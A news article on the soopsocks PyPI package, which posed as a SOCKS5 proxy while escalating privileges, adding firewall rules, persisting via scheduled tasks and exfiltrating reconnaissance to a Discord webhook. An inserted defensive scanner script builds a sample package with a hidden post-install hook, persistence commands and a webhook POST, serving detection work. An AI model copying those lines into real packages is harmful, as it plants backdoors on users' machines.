    Malicious PyPI Package soopsocks Infects 2,653 Systems Before Takedown

    By Techurz | October 2, 2025 | Updated: May 10, 2026 | 3 Mins Read
    Oct 02, 2025 | Ravie Lakshmanan | Python / Malware

    Cybersecurity researchers have flagged a malicious package on the Python Package Index (PyPI) repository that claims to offer the ability to create a SOCKS5 proxy service, while also providing stealthy backdoor-like functionality to drop additional payloads on Windows systems.

    The deceptive package, named soopsocks, attracted a total of 2,653 downloads before it was taken down. It was first uploaded by a user named “soodalpie” on September 26, 2025, the same date the account was created.

    “While providing this capability, it exhibits behavior as a backdoor proxy server targeting Windows platforms, using automated installation processes via VBScript or an executable version,” JFrog said in an analysis.

    The executable (“_AUTORUN.EXE”) is a compiled Go binary that, besides including the SOCKS5 implementation as advertised, is also designed to run PowerShell scripts, set firewall rules, and relaunch itself with elevated permissions. It also carries out basic system and network reconnaissance, including collecting Internet Explorer security settings and the Windows installation date, and exfiltrates the information to a hard-coded Discord webhook.

    “_AUTORUN.VBS,” the Visual Basic Script launched by the Python package in versions 0.2.5 and 0.2.6, is also capable of running a PowerShell script, which then downloads a ZIP file containing the legitimate Python binary from an external domain (“install.soop[.]space:6969”) and generates a batch script that’s configured to install the package using the “pip install” command and run it.

    The PowerShell script then invokes the batch script, causing the Python package to be executed. The package, in turn, elevates itself to run with administrative privileges (if it is not already running with them), configures firewall rules to allow UDP and TCP communication via port 1080, installs itself as a service, maintains communication with a Discord webhook, and sets up persistence on the host using a scheduled task so that it automatically starts after a system reboot.

    “soopsocks is a well-designed SOCKS5 proxy with full bootstrap Windows support,” JFrog said. “However, given the way it performs and actions it takes during runtime, it shows signs of malicious activity, such as firewall rules, elevated permissions, various PowerShell commands, and the transfer from simple, configurable Python scripts to a Go executable with hardcoded parameters, version with reconnaissance capabilities to a predetermined Discord webhook.”
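The traits JFrog lists above (a bundled VBScript and executable, install-time execution, PowerShell invocation, firewall and scheduled-task commands, and a hard-coded Discord webhook) are all visible in a package's files before anything is installed. The script below is an added example written for this article, not JFrog's tooling or anything from the soopsocks package: it walks an unpacked package tree and reports which of those indicators each file trips. The package layout and file contents it scans are constructed for the demo and only mimic the chain described above; the indicator names, regexes and scoring are this example's own assumptions.

```python
"""Static indicator scan of an unpacked Python package (added example, not the
article's or JFrog's code). The SAMPLE_FILES tree below is constructed for the
demo and does not reproduce the real soopsocks package."""
import re
import tempfile
from pathlib import Path

# Each indicator is a regex tagged with the behaviour it points at (assumed names).
INDICATORS = {
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I),
    "firewall_rule": re.compile(r"netsh\s+advfirewall|New-NetFirewallRule", re.I),
    "scheduled_task": re.compile(r"\bschtasks\b|Register-ScheduledTask", re.I),
    "powershell_exec": re.compile(r"powershell(?:\.exe)?\s+-", re.I),
    "install_hook": re.compile(
        r"cmdclass\s*=|class\s+\w+\((?:install|develop|egg_info)\)"),
    "subprocess_in_setup": re.compile(r"\b(?:subprocess|os\.system|os\.popen)\b"),
}
# Scripting and binary artefacts a pure-Python proxy library has no reason to ship.
SUSPICIOUS_SUFFIXES = {".vbs", ".exe", ".bat", ".ps1"}


def scan_package(root: Path) -> dict:
    """Return {relative_path: [indicator, ...]} for every file that trips a check."""
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        hits = []
        suffix = path.suffix.lower()
        if suffix in SUSPICIOUS_SUFFIXES:
            hits.append("bundled_" + suffix.lstrip("."))
        # Binaries are read with errors ignored; we only pattern-match printable text.
        text = path.read_text(encoding="utf-8", errors="ignore")
        for name, pattern in INDICATORS.items():
            # Process spawning is only a red flag where it runs at install time,
            # i.e. in setup.py, before the user ever imports the package.
            if name == "subprocess_in_setup" and path.name != "setup.py":
                continue
            if pattern.search(text):
                hits.append(name)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def risk_score(findings: dict) -> int:
    """Count distinct indicators across the package: one hit is noise, a cluster is not."""
    return len({hit for hits in findings.values() for hit in hits})


# Constructed sample tree (hypothetical) mirroring the chain the article describes.
SAMPLE_FILES = {
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "import subprocess\n"
        "\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        install.run(self)\n"
        "        subprocess.Popen(['wscript', 'pkg/_AUTORUN.VBS'])\n"
        "\n"
        "setup(name='example-pkg', cmdclass={'install': PostInstall})\n"
    ),
    "pkg/_AUTORUN.VBS": (
        "CreateObject(\"WScript.Shell\").Run \"powershell -File pkg\\bootstrap.ps1\", 0\n"
    ),
    "pkg/bootstrap.ps1": (
        "netsh advfirewall firewall add rule name=EXAMPLE dir=in action=allow protocol=TCP localport=1080\n"
        "schtasks /create /sc onstart /tn EXAMPLE /tr C:\\EXAMPLE\\run.bat\n"
        "Invoke-RestMethod -Uri https://discord.com/api/webhooks/000/EXAMPLE -Method Post\n"
    ),
    "pkg/__init__.py": "def start():\n    return 'socks5 stub'\n",
}


def write_sample(root: Path) -> Path:
    """Materialise SAMPLE_FILES under root and return root."""
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def scan_sample() -> dict:
    """Write the constructed package to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_package(write_sample(Path(tmp)))


if __name__ == "__main__":
    result = scan_sample()
    for rel, hits in result.items():
        print(f"{rel}: {', '.join(hits)}")
    print("distinct indicators:", risk_score(result))
```

To run it against a real download, unpack the sdist or wheel (`pip download --no-deps --no-binary :all: <name>`, then extract) and call `scan_package` on the extracted directory. The score is deliberately a count of distinct indicators rather than a verdict: a `subprocess` call in `setup.py` alone is common in packages that build native extensions, but together with a bundled `.vbs`, a firewall rule and a webhook URL it matches the pattern JFrog describes closely enough to block the install and escalate.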

    The disclosure comes as npm package maintainers have raised concerns about the lack of native 2FA workflows for CI/CD, self-hosted workflow support for trusted publishing, and token management, following the sweeping changes GitHub introduced in response to a growing wave of software supply chain attacks, Socket said.

    Earlier this week, GitHub said it will shortly revoke all legacy tokens for npm publishers and that all granular access tokens for npm will have a default expiration of seven days (down from 30 days) and a maximum expiration of 90 days, which was previously unlimited.

    “Long-lived tokens are a primary vector for supply chain attacks. When tokens are compromised, shorter lifetimes limit the window of exposure and reduce potential damage,” it said. “This change brings npm in line with security best practices already adopted across the industry.”

    It also comes as the software supply chain security firm released a free tool called Socket Firewall that blocks malicious packages at install time across npm, Python, and Rust ecosystems, giving developers the ability to safeguard their environments against potential threats.

    “Socket Firewall isn’t limited to protecting you from problematic top-level dependencies. It will also prevent the package manager from fetching any transitive dependency that is known to be malicious,” the company added.
